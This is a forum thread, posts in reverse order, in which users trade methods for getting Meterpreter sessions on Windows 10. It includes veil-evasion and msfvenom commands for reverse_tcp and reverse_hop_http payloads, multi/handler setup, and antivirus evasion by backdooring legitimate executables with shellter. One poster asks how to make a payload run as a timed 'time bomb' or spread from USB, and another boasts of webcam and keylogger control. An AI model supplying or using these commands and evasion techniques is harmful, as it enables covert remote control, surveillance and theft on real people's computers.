[metasploit and windows 10]

No, you would have to run something to set up the scheduled task to run the script.

well thn thats something different, there are many other options to do something l ike that,

i am interested in something like that will do it all on its on an exe that will execute on its on....

[metasploit and windows 10]

On Linux

Crontab

#echo new cron into cron file
echo "00 09 * * 1-5 echo hello" >> newcron
#install new cron file
crontab newcron

On Windows scheduled task

SchTasks /Create /SC DAILY /TN "The_name_of_your_task" /TR "notepad.exe" /ST 04:00

There are alot of other task schedulers. None of which I have used.

can exe file execute on given date automatically using cron?

lets say i put that exe file in USB and plug that usb in other pc and copy that exe file there

without first executing it by clicking, i just copy it and leave it there, will it automatically execute?

[metasploit and windows 10]

any also is there a way to program an payload.exe in a way that it executes like a time bomb? i mean you set a date like say

15.01.2016 and thats when it executes automatically?

i really am interested in something like that....

[metasploit and windows 10]

This is stupid question. But do you have port 8080 open on the Windows 10 machine?

netsh advfirewall firewall add rule name="Open Port 8080" dir=in action=allow protocol=TCP localport=9999

If you want to test your payload to see if it works. Test it without the firewall first.

I had problems about a month ago trying to shell a Windows 10 box and here's some stuff I figured out. Windows 10 has some security features that are not available in previous version of Windows. I'm not sure how it all works. Windows is will notice that your payload is trying to hook into other system processes or DLLs on the windows system. But if inject your payload into the execution flow of an legitimate application it will run just fine and Windows isn't going to notice anything fishy.

Here's something else you can do. Use a reverse_hop_http meterpreter

msfvenom -p windows/meterpreter/reverse_hop_http -e x86/shikata_ga_nai -i 3 --platform win HOPURL=http://192.168.0.184/hop.php EXTENSIONS=stdapi,priv -f raw -o
/root/Desktop/donkeypunch.raw

You can output it to whatever format you think will work. I noticed my payloads were getting flagged by security essentials and other anti-virus programs so I decided I would backdoor a legitimate executable. I did that with a program called shellter. Worked like a charm.

Keep in mind that shellter will not work with all binaries and also doesn't work every time. Sometimes you will have try backdooring the exe several time before it's successful. Shellter does a lot of stuff that is at this point technically beyond me. But you can read about it on the website. https://www.shellterproject.com/

Payload is build make available for download. Don't forget to move hop.php to your /var/www/html/ folder and start apache.

use explooit/multi/handler
set HOPURL http://192.168.0.184.hop.php
set payload windows/meterpreter/reverse_hop_http
exploit -j

Once the binary is ran on the Windows 10 machine, you should see a session. If you get a session for like 20-30 seconds and then the session dies, it's because your payload was caught by Windows 10 security features.

The great thing about this is once you build a payload like this it will work on Windows 7 or XP as well.

Also I think there's a way to bind meterpreter to edge or internet explorer with prepend migrate and masquerade as that application so it can hop the firewall that way. If there is a way to do that I would like to know it.

thanks alot for the reply, i will try it it out with my friend tomorrow.

Well yes the port 8080 was open when we were testing it but the problem ist not windows 10 security anymore, we managed to get the working session from windows 10 using

meterpreter/reverse_https and using ReverseListnerBindAddress command, we managed the connection, the problem now is something so weird that i have never

encountered it before.

So the problem is

my friend is using

hitron technologies CVE-30360 router and no matter what exploit or rat you use, this router seems super intelligent compare to other routers.

You can locally (on LAN) hack into any window through this router using metasploit but on INTERNET it seems ALMOST impossible.

these are the things we have tried so far

my friends windows 10 laptop which is 200 km away from me is connected to hitron technologies

CVE-30360 router.

So as long as it is connected to thing router, you will get no sessions on metasploit from it NONE it wont work, even darkcomet RATS (which doesnt work on window 10 anyway) wont work on older windows like xp and 7 or 8 even if all the PORTS are open all the security is down still you cant get anything from it through internet.....

but if you try metasploit and Darkcomet Rats LOCALLY, they work fine that router will allow local traffic to pass, locally you can exploit any window with metasploit

so now we thought let us disconnect out windows 10 laptop from hitron technologies CVE-30360 router and connect it to internet thought IPHONE 6 LTE tethering....

so we did that and what do you know? you get a session on metasploit, you can exploit the window 10 anyway you want, you can play around with data, cmd, webcam, keylog anythin UAC controls anything you want and when you connect it back to hitron technologies CVE-30360 everything stops and trust me all the ports are open we have tried Netcat listner, you can open backdoors yet still...

i mean i could be missing something but i really never experienced anything like this before...

[metasploit and windows 10]

done all ports are open and working, allowing traffic

now i have realised something

i have just tried the same file on another friends laptop (he is using windows 10)

it worked even though he is very far away

so i thought okay why wouldnt it worked on my first friend so i asked my first friend to disconnect his windows 10 laptop from router he is using and connect it to internet

thought his iphone (using lte data) as he did that, it worked and it worked perfectly i was able to get connection

now is it possible that ROUTERS dont allow it? even thought his router firewall was also down and he ven opened few ports for me stil it wasnt possible

he is using this modem

hitron technologies

CVE-30360

i asked him to do it locally using his lan and as he tried it, it worked i mean this problem is so absurd that its funny

-he gets sessions from window 10 laptop using his kali 2.0 when they both are connected to same network

-when windows 10 laptop is connected his iphone LTE, I get sessions aswell

-when his windows 10 laptop is connected to his router, i dont get any sessions anymore yet he still gets from his other kali 2.0 system on same network

i mean what in that router could be stopping it?

[metasploit and windows 10]

i will try it with netcat but i do believe traffic is being forwarded because i used the same port and use darkcomet

it works like a charm (only on windows xp, 7 and 8) not on 10

i will still try to netcat chat

[metasploit and windows 10]

Have you got port forwarding set up on your router so the port you specify in the payload is mapped back to your machine?

Look back in the forums, debugging this has been discussed quite a few times.

yes my KALI 2 (on VMWARE) has this IP

192.168.0.5

and on my router i have 8080 port forwarded and i can also see 8080 opened on canyouseeme website....

btw i also tried with duc no-ip using reverse_tcp_dns and still no success.

i have searched the forum again and again without much success.....

[metasploit and windows 10]

Hello guys,

I am posting here for the first time but i have been following these forums for a while now.

me and my friend are trying to create a payload to hack into windows 10 and control is using metasploit.

Now we have done similar testings before on windows xp, 7 and 8.

Now in backtrack, it all worked smoothly mostly and mostly we tested over the lan but now

we want to test on windows 10 which is 200 KM away from my place. Its my friends system, he has taken windows firewall

and antivirus off, defender is also not running and all the security is down.

There is a method of getting into windows 10 using Macro, we havent tested that yet but that will be next logical step for us.

So now to the problem

We are using Kali 2.0 (i am still using windows 7 due to some tech. reasons) on my windows 7 i am running kali 2.0 using VMWARE (BRIDGED NETWORK)

so when i create payload and sent it to my friend on his windows 10, it doest open any session for me, he tried same file on his windows 7 and still metasploit opened no session for me.

Here is what i am doing

using veil-evasion i use windows/meterpreter/reverse_tcp

LHOST (my public ip)

once i tried to my open port which was 8080 when that didnt work i tried without giving any port in this first step

so after generating the file called test.exe

i opened my msfconsole and did following

-use exploits/multi/handler (duh)

-set payload windows/meterpreter/reverse_tcp

-set LHOST (my Internet Kali IP)

-set LPORT 8080

-exploit

so now its running and i gave file to my friend, he opened it in windows 10 nothing happend, he opened it in windows 7, nothing happend he opened it in even old xp and nothing happend...

now i thought ok let me try it on lan

so this time during first step i gave LHOST (internet KALI IP) with LPORT 8080

and create a filed called testlocal.exe

when i opened it on windows 10 locally it worked perfectly i got the session

so my question is, why isnt it working over the internet? i mean we have tried the app called DARKCOMET and it works on his WINDOWS xp, 7 and 8 but not on windows 10 (for obvious reasons)

but this payload isnt working on any windows at all over the internet, am i missing somethinig? am i doing something wrong?

I havent tried Macro method yet but once i have success here i will go for macro method.

any idea guys?

thanks in advance

and forgive my english :)